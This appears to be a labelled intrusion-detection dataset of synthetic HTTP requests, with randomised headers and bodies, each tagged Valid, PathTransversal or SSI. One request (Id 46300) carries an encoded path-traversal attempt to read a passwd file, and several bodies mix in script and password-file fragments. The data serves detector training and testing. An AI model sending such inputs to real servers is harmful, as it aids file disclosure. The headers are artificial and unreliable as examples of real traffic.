Start - Id: 33742
class: Valid
POST /nLnTYu6LkPPcalst/rZH_Xl6Ie3EJ-PFEDm/a_tliqTgbY1f.HU/si0/dH/.execZ0Nd4X/dz14m0kpN0q/sispta.shtml? HTTP/1.0
Content-Length: 192
Content-Language: in,ertde
Content-Encoding: deflate
Content-Location: http://86Cne7tk.net/eato/aNnod2/mtiosa/idOnns/enito.css
Content-MD5: YWNuUmQ5aHBocjVpVHJtaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Sep 04 09:30:38 UTC
Last-Modified: Thu, 26 Aug 04 11:29:27 CET
Host: www.noatE.ch:2785
Connection: dtt7ee
Accept: image/png;q=0.7
Accept-Charset: x-mac-chinesesimp;q=0.7, iso-8859-2;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 42.66.55.236
Cookie: SjaUeez3Msdba=oCoz1Um70lJK;itoese4ida=nr/ri;c2CdSe7cb=Rftp4
Cookie2: $Version="19"
Date: Sun, 30 Mar 08 09:58:33 CET
ETag: "sRRxnJ6Z_qxKvecEKi.-"
Expect: 100-continue
From: ocSTi@saeeTeucT.ch
If-Modified-Since: Fri, 04 Jun 04 02:13:27 UTC
If-Unmodified-Since: Tue, 01 Jul 08 20:32:08 GMT
If-Match: *
If-None-Match: "utqOj.CjT@BD5xCAX6wa"
If-Range: "FnhDSXnfh-YON3PZNWQ"
Max-Forwards: 4603
MIME-Version: 5.5
Pragma: yn=6lOct0ao
Proxy-Authorization: dotzna obUns=tvetsd
Authorization: Basic MmhuaGQ6bHNucg==
Range: 157212-,-82365,95975-54243
Referer: /qtpiE0nj/ioad/e5iax.msf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/7.9 (compatible; MSIE 2.9; Windows NT; ulnm2; rntSienty)
UA-CPU: StrongARM
UA-Disp: 020,4035,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 520x205
Via: rioil/9.1 www.hc3pwea.js
Transfer-Encoding: compress
Upgrade: emiexT/3.0, iinIni/9.7, efhial/0.0, rndpy/6.5, en3mcn/3.8
Warning: 146 www.heyaohc7.png "iqTeaiaieCen" "Thu, 28 May 09 11:14:53 UTC"
X-Forwarded-For: 109.249.70.237
X-Serial-Number: 695598853636
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hpseop5XlSyfotr=1dtacmlliao&el4n5c4icutt=59812660&mtedfouife=71502&tdcdzdp=613894754&etnIputowl=4&smch1=S>DC ioi&ihetkhrln68kr0=te5econnecte&eenceem=98&hoo8acinl=wctacdI&oqnlNendiaRm=5727697

End - Id: 33742
Start - Id: 31564
class: Valid
GET /ruDalysjoimo2r9Dan/ahlenrDasiaolt/od3AbIgzGE5.php? HTTP/1.0
Host: www.1Tleeup.uk
Connection: close
Accept: */*
Accept-Charset: us-ascii, koi8-r;q=0.9, x-mac-cyrillic, euc-jp;q=0.7, koi8-r;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 201.238.6.219
Cookie: no=92;terx=bdB6Ubdz;tib=iYJ
Cookie2: $Version="8"
Date: Mon, 27 Aug 07 13:40:22 CET
ETag: "SieCCYSjLMMQo1sQ"
Expect: gTTDn
From: iaar@tt4tqltp.org
If-Modified-Since: Wed, 28 Oct 09 13:28:13 GMT
If-Unmodified-Since: Wed, 13 Jun 07 13:07:36 GMT
If-Match: "tdsBe17qCHBmIUOODV"
If-None-Match: "y_5lcgoa3vGceshM"
If-Range: ".0ZtQS-vwsl2cggyfSNN"
Max-Forwards: 7705
MIME-Version: 7.2
Pragma: X8sun=nrA
Proxy-Authorization: eeorEe naUtOlss=eeEme
Authorization: Digest nc=1096d7a7
Range: 5-
Referer: /adse/3o5hAnr2/Vpkdea4.zip
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/4.1 (X11; U; Linux i586 8.3; oE-oo; rv:4.6.7) Gecko/86516749
UA-CPU: 68000
UA-Disp: 7964,455,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 951x498
Via: 2.8 www.axswirq.htm
Transfer-Encoding: gzip
Upgrade: euhcat/6.1, iyn/4.6, ie5n/5.4, ttm5/0.0, raira/5.9
Warning: 368 www.ergmb.gif "hlleNwwiAeidy" 
X-Forwarded-For: 190.159.59.68
X-Serial-Number: 7616561595248452
----: --------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31564
Start - Id: 5098
class: Valid
POST /roewtiawUpkz/h_.mcME3Q6Pt7mou/ien5ranaNinhq8tdn/hnceEartIhtsn7rss/fzVM1KGwc7h8cI86/nig0bjqdisftho/fai0fsi/phziSr.php4? HTTP/1.0
Content-Length: 296
Content-Language: Mamusaag,2
Content-Encoding: gzip
Content-Location: /lims/a7eiibf/l62DlaZ/nhscgn.txt
Content-MD5: b281c2hyZWJtdHVPb1c4NA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Feb 08 23:59:40 CET
Last-Modified: Mon, 16 Aug 04 12:43:54 UTC
Host: www.rtc4sooa.uk
Connection: keep-alive
Accept: video/*
Accept-Charset: x-mac-korean, iso-8859-4, iso-8859-6;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 204.102.238.44
Cookie: nitiscT3aTsdItl=os;tyO=ooestzs|v3;khB=71000730
Cookie2: $Version="95"
Date: Wed, 02 Nov 05 06:15:17 UTC
ETag: W/"LFcKMZyrxhCjhh-iXm"
Expect: pispa
From: dthmE@rrep.ch
If-Modified-Since: Fri, 10 Aug 07 19:55:17 GMT
If-Unmodified-Since: Thu, 25 Dec 08 06:43:36 UTC
If-Match: "g4R-GREagTHdgDcG"
If-None-Match: "XP@X_kjxP9aUI1m"
If-Range: "Z8V6IGl0bz6vQL@SF"
Max-Forwards: 5921
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dGlzRzhldzpsN3dpaW53eQ==
Authorization: Digest nc=a9eB4Dbd
Range: 4666-,507125-81685,186998-
Referer: http://e4zds.com/oEstfo/gelpe/eeoaw/cuia/st5h.cfm
TE: deflate
Trailer: Host
User-Agent: ekt8I5w
UA-CPU: PowerPC
UA-Disp: 850,8218,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6083x0063
Via: 1.2 110.71.186.247, FTP/9.2 76.158.144.5:3
Transfer-Encoding: gzip
Upgrade: efd74o/3.6, MmfD/3.2, o6ce/9.4
Warning: 201 30.198.208.54 "slstaBaOnasolmatoin" "Thu, 04 Nov 04 06:08:49 GMT"
X-Forwarded-For: 248.188.122.40
X-Serial-Number: 093025273
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_m1GhtpassDL4e=hheoc&hoaed=32957586&3t9p5ico=eT&4r3tbdcoto=hdrsnfte&locationih.6X_jmS-=st&wghi1otonhnR=aZT1E4I6vs&ycaoonr5aiLiet=it&eilptrrxugese=nhEDYoAnlp&krsd5hhefaup=14zlnee&pnoON=te5 aVe&enen=88899236&kcJo6A=teias22d&nlgxwegpmtt=xtermEyvbscriptj&wsiu6t=  mxna+na&QKpBw1LlOI=narUtfbtejnpyen

End - Id: 5098
Start - Id: 3450
class: Valid
GET /scu/posn23i0ttemdswb/ayQr0E789iUduq9dfRN/access_log3Wx8BmqH/tem/L-kv/aUHh1M7CW@aqj/9pcctt7ae/oCbH2kdOoWOgJVtBhiVq/tooulatiianLd5alkhh.cfm?f2q8wv2_mFhavings=rn38srkshaas%7Et HTTP/1.0
Host: www.scuno.biz
Connection: 2eeta
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.0, identity;q=0.3
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 127.241.78.132
Cookie: TX6Ev1=3501461;nNlngauT=za1nlahoos;lha4lftiOo=03477;em50etNAipgkbos=a46Ue
Cookie2: $Version="73"
Date: Wed, 18 Aug 04 22:57:56 CET
ETag: W/"4.wjfiIREqmYHD5Y"
Expect: Ueo8n=huroAR68
From: otEj@3satd.de
If-Modified-Since: Fri, 18 Jul 08 02:30:31 GMT
If-Unmodified-Since: Sat, 16 Aug 08 11:57:47 GMT
If-Match: "DTamJlMARellTpUQue-"
If-None-Match: "V6j1REIXnYcwDIkQg"
If-Range: *
Max-Forwards: 8491
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: r5le hmnr=ywltxE
Authorization: Digest nc=Da503721
Range: 516789-
Referer: /cc5J.fgf
TE: trailers
Trailer: Date
User-Agent: Mozilla/3.2 (compatible; MSIE 1.7; Mac OS X; uraHto4nib; 8OiEp2h; ilOdr9fri)
UA-CPU: MIPS
UA-Disp: 426,091,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8177x498
Via: 1.3 140.224.121.106:21
Transfer-Encoding: deflate
Upgrade: he2aGa/7.2, t4cmu/0.8
Warning: 341 98.142.108.251 "04lnsrolao" "Sat, 17 Jan 04 10:07:50 CET"
X-Forwarded-For: 118.211.6.212
X-Serial-Number: 425170
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 3450
Start - Id: 46300
class: PathTransversal
GET /AworbxM/7v/plnnp/lzeaK@v/dzEttriostikr/tDs1p9PLdSEICoqQA9v/wn1trcd6gsrn0a/ag/qUVMrfwVofHr/iIh9aw7wdyaoaax9.jpeg?erdsWno=%2F%2C%2C%2C%2Ftice%2Ftfrih2%2Fpasswd HTTP/1.0
Host: 204.75.185.175
Connection: keep-alive
Accept: text/xml, video/*;q=0.5
Accept-Charset: shift_jis;q=0.2, iso-2022-kr;q=0.0, isiri-3342
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 34.236.80.20
Cookie: 8RD@p_@=3107504;weplj=un n\n;sperlLshutdown=eqxp_naO)~ER6oalinktranrq;jentban=2088628350;orA1eyusSpOmegN=2H.qaJXUcJk
Cookie2: $Version="73"
Date: Sat, 16 Feb 08 16:17:08 CET
ETag: W/"l1XkmFGdW1ggoyh14oL"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Thu, 13 Dec 07 21:04:21 UTC
If-Unmodified-Since: Tue, 20 Dec 05 24:56:40 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Jul 09 10:55:43 CET
Max-Forwards: 4549
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: bIda Eheqb=Oiplme
Range: 5-,07-2
Referer: /auea40ss/avjrrho/fntit/anMilr/eamzd.mpg
TE: gzip;q=0.9,trailers,gzip;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.3 (Windows; U; WinNT 7.1; te-is; rv:5.1.5) Gecko/02004828
UA-CPU: 68000
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 3.7 www.yilftr.gif:2112, ait/3.7 103.159.168.69
Transfer-Encoding: gzip
Upgrade: rri3/7.9, gpmees/3.2, aFeB/6.3
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46300
Start - Id: 7318
class: Valid
PUT /srOnwsie/1mpse/3toFzQ2/lU/LXh7XRkWNCdkMs4.jpg? HTTP/1.0
Content-Length: 107
Content-Language: Ee
Content-Encoding: identity
Content-Location: /tooer/lrAgf9au.exe
Content-MD5: cG9saGhsSWVmdHVodnRvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Mar 10 01:03:36 CET
Last-Modified: Mon, 21 Feb 05 21:25:09 GMT
Host: www.e1ssowtn.st
Connection: Tidomt
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 10.100.202.44
Cookie: nod43ic=936386;sz=2039681;gkw_Ddinput=tsm-eoh0ote;oi=6
Cookie2: $Version="8"
Date: Mon, 13 Jul 09 11:25:16 GMT
ETag: W/"jcb_JYK3Pxu74hQ"
Expect: aewvw
From: emioch@iEegtwHstl.be
If-Modified-Since: Wed, 23 Jul 08 12:24:40 CET
If-Unmodified-Since: Tue, 07 Sep 04 22:31:10 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 93
MIME-Version: 8.2
Pragma: henf=bl
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic dXlpMDdpZWE6TmVkZXQzdGw=
Range: 6-94,-90
Referer: /tfat/rptkimat/I6sbstD/2plx.jpg
TE: trailers,chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: eAfzrbdcyO/2.2.4
UA-CPU: 68000
UA-Disp: 4520,707,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1302x7380
Via: 6.0 www.eswnIAn.png
Transfer-Encoding: gzip
Upgrade: Pcr/6.7, asmrbh/9.1, ayi/9.1
Warning: 465 193.0.29.240 "9tdbganttoetamdoth" 
X-Forwarded-For: 180.148.168.191
X-Serial-Number: 298853194936
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

jvuCI_IbfN=lOtmL&5EaEQXlwmochay=exectodbhhnJndtogm0&jW@-vSnph-x0uD='opositionsE&led=u &nuceTlhnhxeo=51413

End - Id: 7318
Start - Id: 20122
class: Valid
GET /sMjxCGF@eXtkYe/7lww7/d4snrrnhromr/a86g7gXK8yM2pk8tNQ/Si.css?9Iev3r=574&odaxEen7Wiertxq=Vfesiuccte1hhtccte&ziRagthv5e=nsvzE&noeicure6tosti=ngtxyeaIitae2dh7s&tW7rr=7axeltsitdzxafvnoI&im7dal=eGJ75Ml&qKYIO4S=oba HTTP/1.0
Host: www.coom.fr:9185
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 246.3.229.109
Cookie: ff=edsedeoE+lE;eo3ntdnuqdb=b<@ne Y;uSelt=bJ0LmIODHV;dmtic=3VjFZ
Cookie2: $Version="81"
Date: Fri, 29 Aug 08 01:27:38 UTC
ETag: W/"Tf8X3CXAf5I45DGs.4H."
Expect: 100-continue
From: t261O@oawcrm.be
If-Modified-Since: Mon, 27 Sep 04 05:55:26 UTC
If-Unmodified-Since: Sat, 10 Jul 04 08:25:36 CET
If-Match: "iPwl0Zw7uw7w--5"
If-None-Match: "DRHlZzgdhKlpRenG"
If-Range: Tue, 13 Mar 07 03:20:11 UTC
Max-Forwards: 842
MIME-Version: 9.3
Pragma: coti='weesh'
Proxy-Authorization: NTLM dEVldGlyYW5yeGlyYWV6dWVobnRUZG5uYTNOY2NhUm9yZXN0bA==
Authorization: aoMoA rbnU=YhsEEmt
Range: 48910-875971,804755-62
Referer: /htndij/tAsixnhT.jsp
TE: gzip,trailers,gzip;q=0.2
Trailer: Host
User-Agent: Mozilla/5.7 (X11; U; Linux i586 2.5; u3-mE; rv:7.9.1) Gecko/92777705
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2245x9664
Via: HTTP/1.8 www.eoke.gif
Transfer-Encoding: eiqrse
Upgrade: jtnwgT/9.0
Warning: 660 www.e06sbm.png:915 "itsTnmtqleDAXa" "Fri, 23 Dec 05 19:02:37 GMT"
X-Forwarded-For: 171.141.7.56
X-Serial-Number: 9909201039312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20122
Start - Id: 32983
class: Valid
PUT /eZePFLCDC3lz1/5ihDietl9hE/Baanu/likeUI.cfm? HTTP/1.0
Content-Length: 292
Content-Language: eyi
Content-Encoding: identity
Content-Location: /Ohldi/Uahool/8t85mrly.asp
Content-MD5: aW5yYWhpcG9zdG9kVG50bA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Feb 07 16:53:13 CET
Last-Modified: Thu, 23 Nov 06 07:43:11 UTC
Host: 13.242.146.25
Connection: tngc4c
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7
Accept-Language: *;q=0.1
Cache-Control: min-fresh=7
Client-ip: 102.188.18.212
Cookie: aseA0r=069522
Cookie2: $Version="812"
Date: Fri, 15 Jul 05 17:49:42 GMT
ETag: W/"ivkb-HZBwJXpc7uGkpG"
Expect: 100-continue
From: nxhoo@luihsl.gov
If-Modified-Since: Sat, 31 May 08 12:14:25 GMT
If-Unmodified-Since: Fri, 19 Nov 04 04:28:32 UTC
If-Match: "qz36rNVXpQzR6gcR2EHF"
If-None-Match: *
If-Range: Sat, 18 Aug 07 05:14:54 GMT
Max-Forwards: 0
MIME-Version: 9.1
Pragma: n1i=srtEnhsy
Proxy-Authorization: Basic bW1hdDpubXJrbg==
Authorization: Digest qop=auth
Range: -5326
Referer: http://www.cn4wc.de/qleoz2sa/7hen/tbodee/lle4ot.mp3
TE: trailers,chunked;q=0.3,trailers
Trailer: Referer
User-Agent: SestteIbt (vxHkgL)
UA-CPU: x86
UA-Disp: 8787,462,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 596x2213
Via: 7.6 www.woot.js, HTTP/6.0 www.ttrss.jpeg, 6.6 www.6i04eoa.tiff
Transfer-Encoding: gzip
Upgrade: seoh/4.5, k3f0q/5.1
Warning: 960 www.dvr2eom.js:20 "esme5cmn4diad" 
X-Forwarded-For: 225.92.175.53
X-Serial-Number: 62410
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

skmnv=@rJiirteHirehfrom/o0% s&dae=751403&w37hlhatnsh=fwit><s&sEo7aasih3yl=eid&YJG1WJ5ch=F$window.open&uhtyrsdia=o8pa@0BbX6F&ehs3l14ja2iieae=p?otsey&t2oafGyc=I4] &ea56teea=b(onroti&onqierD5ntncn=s34nofagr&tiarae=wzt3dao&Bea4=sIdeleteum&aer7W2uhk=oFwM&de=72638&QTbj6wG=eC4HZ

End - Id: 32983
Start - Id: 2884
class: Valid
GET /oh38rr4tu/4MjD9R33OvQFUl5/uzzOOfiB.mdb?5egcetin=eusrsudoam%29ns0&nlenia=577 HTTP/1.0
Host: www.lblH.ch:80
Connection: St3fe
Accept: image/*, application/*;q=0.1, text/plain
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: riT0sf=5n3h7SAt
Client-ip: 127.198.31.99
Cookie: eapmsl7Dhl4tjn=b D di  rtrm
Cookie2: $Version="5"
Date: Wed, 12 Jul 06 13:18:45 UTC
ETag: W/"75mKU4khjzIg6n5ch3"
Expect: inrsK=thdtun
From: amatu@3ain.cz
If-Modified-Since: Wed, 22 Apr 09 02:00:09 GMT
If-Unmodified-Since: Sat, 25 Jun 05 13:30:43 UTC
If-Match: "ae@Ii-86D6FCNmno"
If-None-Match: *
If-Range: Wed, 09 Jul 08 15:18:04 CET
Max-Forwards: 37
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: qsge uxna2zu=krees
Authorization: NTLM dGVibnR2dHRlNGFOaEllb21oemdoZUhlSTllcHVhN2FyZXR1aXJu
Range: 11041-66738
Referer: http://www.deewt.net/Jpdde/crh0drrE/aypc.mdb
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 1.7; ss-oe; rv:2.1.6) Gecko/16187088
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 640x6169
Via: HTTP/9.2 www.snNngth.tiff:79495
Transfer-Encoding: compress
Upgrade: 7I07i/0.7, ri7He/2.5
Warning: 969 www.nthaNniO.tiff "euint3iarnws" "Sat, 08 Aug 09 16:51:19 GMT"
X-Forwarded-For: 61.7.104.185
X-Serial-Number: 440914790634409640
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2884
Start - Id: 29097
class: Valid
GET /hCyNLIBa/xesrr7eElkailtysnec/65itersAoraLLxeh/P4Ue/8z/Hmasddakea2echihyis/eAH21wpVzKdD35J5BOi.cfm?ct6nE=22550768&WtmpGTaccess_log5QS=rdwinntu&TZy8linkrcpk=leeb++aha0pkf7lsl&eeCe=diI&Fosna36ew=7316&sniTynes=eca&GGXV=6&caihstt=dCdem&aoe=uesnaAbSi2lLwm&mRtksedsei=Mie&noo=20&9iu7=en2qelsweX&rmq=b%25udoohlacc&e2=5260392&ptpeitlIe=snALChdf HTTP/1.0
Host: 229.183.131.179
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew, x-mac-arabic;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: t-t;q=0.2, na-tue;q=0.9, 7tine-hlstbe, hoavhey-tu;q=0.3, ha-dtdnlooT;q=0.4
Cache-Control: no-transform
Client-ip: 189.95.44.101
Cookie: inewektsfhoc=kswoTt;eihaaz=48999;M0QAPz-fZuv8=tg
Cookie2: $Version="661"
Date: Sat, 04 Dec 04 14:53:34 GMT
ETag: "PkYPdNa8vUSgxY2igX"
Expect: 100-continue
From: nbrdn3@nn5EreeeAS.fr
If-Modified-Since: Mon, 21 Feb 05 17:52:12 UTC
If-Unmodified-Since: Thu, 08 Dec 05 21:03:23 UTC
If-Match: "iCYDb8jFh2MDjkB"
If-None-Match: *
If-Range: Mon, 06 Dec 04 15:47:13 UTC
Max-Forwards: 97
MIME-Version: 4.5
Pragma: 2ienaa=G0
Proxy-Authorization: aiEVod ino2qn=1ud6sw
Authorization: NTLM bXVvZU9xbzNhV0lzZWlzOFJlZGxpNWlsZXZpdm5yYXNiZWxlZzd1dXNyYQ==
Range: -5612
Referer: http://To8oo75n.st/eiwjA/vlttisfx/9ofaenE/0rtum.dll
TE: trailers,trailers
Trailer: Date
User-Agent: 7vael/0.7
UA-CPU: PowerPC
UA-Disp: 352,591,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7767x3879
Via: FTP/3.3 www.naZeD.jpeg, 0.4 www.weihcsi.jpg
Transfer-Encoding: deflate
Upgrade: rotr/8.6, 0vwd/6.0, 7ye/1.1, etnead/3.9, 7aate3/3.4
Warning: 943 www.fnih2noi.jpg "tejenpysh" "Sat, 13 Mar 10 09:46:30 CET"
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 29097
Start - Id: 5057
class: Valid
POST /J6-/yAlolnaukidos.js? HTTP/1.1
Content-Length: 141
Content-Language: exzla9et
Content-Encoding: compress
Content-Location: /sdItmzal/bt6N/eeoe0oce/aEceup.nsf
Content-MD5: UXRkeGlyRW9ubm11Y25vbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Jul 08 17:27:28 CET
Last-Modified: Wed, 04 Feb 09 05:46:25 GMT
Host: 3.118.91.57:80
Connection: keep-alive
Accept: application/*;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.3, deflate;q=0.3
Accept-Language: tbgmncn-se, i-reac;q=0.0, bvo-2lhfnpt;q=0.6, 0dsstr-sl
Cache-Control: min-fresh=471
Client-ip: 69.30.198.48
Cookie: oarfnbPfuIu= htpassloga7;viaeporm=ptviCntri7;ov=1ozuL3m7NriW
Cookie2: $Version="718"
Date: Mon, 26 Dec 05 21:32:37 CET
ETag: W/"L5xdvBNGLBThSycS"
Expect: 100-continue
From: tpzRon@ec4slh.de
If-Modified-Since: Thu, 22 Jan 09 19:29:31 GMT
If-Unmodified-Since: Tue, 22 Jul 08 21:32:32 CET
If-Match: "7YaAUBrgvclFlU8o"
If-None-Match: *
If-Range: Wed, 30 Nov 05 08:04:28 UTC
Max-Forwards: 2928
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM dGN1YXVmdXRpRWljaG5ydDNvdHZpZThzdGFCdGhuZXU=
Authorization: Digest nc=8Cd6fc9b
Range: -809077,653-170430,-158191
Referer: http://aoilHilp.gov/vnhfqS/iij3/eRqi/oatbhyh.php
TE: chunked;q=0.1,trailers
Trailer: Date
User-Agent: Mozilla/1.1 (X11; U; Linux i586 1.4; ap-pt; rv:8.5.5) Gecko/05747922
UA-CPU: PowerPC
UA-Disp: 522,847,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7112x1130
Via: FTP/7.6 www.kIluD.css, 9.6 www.iapashom.htm
Transfer-Encoding: deflate
Upgrade: 9Ehwn/4.8, rwi0/3.3, UStake/0.9, reEr0s/4.3
Warning: 874 50.12.41.154 "oiigh7oztoeetoski3" 
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 535934521873854374
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

hhzaIf=839547&Dsudqeeoy9eaeT=6&srlittrka=gcgnc4c|v&eIRaee2tet=$o9e87ura1zOj6&4RvtQOs9o=pmthbutlh2t&&unoarsawen4t=87&32kropsttstsisW=tdu

End - Id: 5057
Start - Id: 6023
class: Valid
POST /aafgHcarnrl3x1ish/tbJf3Lx/s3s.S/iHXceLO9AZt16p/0aJY5mM/nrfelqdeatw74bydef/rG2BvmzalN/t4/citafeen0/fYvMJU_M75OVvNI.cfm? HTTP/1.0
Content-Length: 103
Content-Language: itunh,ohk,ttVeeXn
Content-Encoding: compress
Content-Location: /vsoro9t/0nNraoi/vu7t/aleEl/cIf36r.php
Content-MD5: N25ub2JhMXBuZWhlU29zcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Jun 05 13:27:20 CET
Last-Modified: Fri, 15 May 09 01:16:35 CET
Host: www.hypliaedz.be
Connection: pddtfer
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: t-s;q=0.8, sxc4rt-a;q=0.4, 1eeftast-akteoiI
Cache-Control: max-age=5766
Client-ip: 152.52.201.65
Cookie: Zedaka=ruW1KuYDWrde;.Rqpasswdbgsoundobject=e=g)s;tidfsos1vsgeSa=d@lsd4we22bdt@itstzo
Cookie2: $Version="28"
Date: Mon, 27 Sep 04 18:11:49 CET
ETag: W/"cMIlbMCHwg.QOG1"
Expect: 100-continue
From: iwepfth@r0aes3ihc.ch
If-Modified-Since: Thu, 22 Jul 04 21:10:26 CET
If-Unmodified-Since: Thu, 03 Sep 09 24:43:25 GMT
If-Match: "6Uk1_pq.HqNm_FPz@Ca"
If-None-Match: *
If-Range: Sun, 17 Dec 06 10:42:34 UTC
Max-Forwards: 53
MIME-Version: 4.4
Pragma: 3=7hu2db
Proxy-Authorization: Digest response="C82E18E68ca6aC5F717Cc26a73AB6f94"
Authorization: Digest uri=/trds/hsuaey.pdf
Range: -57,295976-,-66
Referer: /hvanna/nyrlnr/ealiuo/odxzGnGs/3ttsu.rar
TE: chunked
Trailer: Date
User-Agent: Ieycfdaeny (k0fNd0; gp0Gucp2D)
UA-CPU: PowerPC
UA-Disp: 653,9690,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3798x773
Via: HTTP/5.8 www.aAob4.jpeg, FTP/8.5 www.ara38.tiff, FTP/4.9 www.gs9aErd.shtml
Transfer-Encoding: identity
Upgrade: 0bhir/0.4, L6llc/5.3, 30WtuO/1.0, eentm/1.5
Warning: 972 www.rXyaxuai.css "RbSVoIei" "Tue, 23 Jan 07 18:13:35 CET"
X-Forwarded-For: 167.170.119.99
X-Serial-Number: 1285901452667782524
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

ettz2m0ese=nsth9mn&aaca99heNsr8nni=iotEilleyovyusua&lnizN=19894973&dq=0roZ9hq52.&H8ia6bsotioya=h1YE72b0

End - Id: 6023
Start - Id: 3158
class: Valid
GET /passwdri/kK-cEkDUA/ebfrvPRuWgrsH1AS.asmx?aeHr=tAtnlexy6wti6&usD3uu1e=93&lhhIE=haaknsyNi5&aTp7BWU=+t&CPMk=jVpoN%40NYFO&fn=idNjABp&tboraxt9gtsa1=lEO8dBt1Rva2&Er4zQQep=e HTTP/1.0
Host: www.ts7d.ch
Connection: close
Accept: video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=49619
Client-ip: 48.176.144.112
Cookie: yY-g0@BxMehomeT=829
Cookie2: $Version="69"
Date: Mon, 04 Oct 04 06:47:47 GMT
ETag: "w8GPw9Ei1.z5UHV5"
Expect: 100-continue
From: 6jethpt@ukvalodoo.net
If-Modified-Since: Thu, 03 Jan 08 13:03:53 CET
If-Unmodified-Since: Sat, 23 Sep 06 12:19:05 GMT
If-Match: *
If-None-Match: "jBguDrzAI4G8KUb9Df9O"
If-Range: "p8f.dqE.q_fP8_kLh@YK"
Max-Forwards: 04
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic ZWl2bDpsdElobkhj
Authorization: Digest realm
Range: -82153
Referer: http://Gdehsnyf.org/ptf0/ogeIoc/r4odu/dmit7/rlaIe.msf
TE: trailers,gzip
Trailer: If-Match
User-Agent: Oat0etlQsn
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5717x5114
Via: 0.9 www.ewenaqP.png:75, esncte/0.7 www.jrath.jpeg, 6.7 www.otnev.htm
Transfer-Encoding: compress
Upgrade: ianerr/8.5
Warning: 106 131.136.130.29 "lIktu" 
X-Forwarded-For: 227.104.147.72
X-Serial-Number: 37153368506514
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3158
Start - Id: 39570
class: SSI
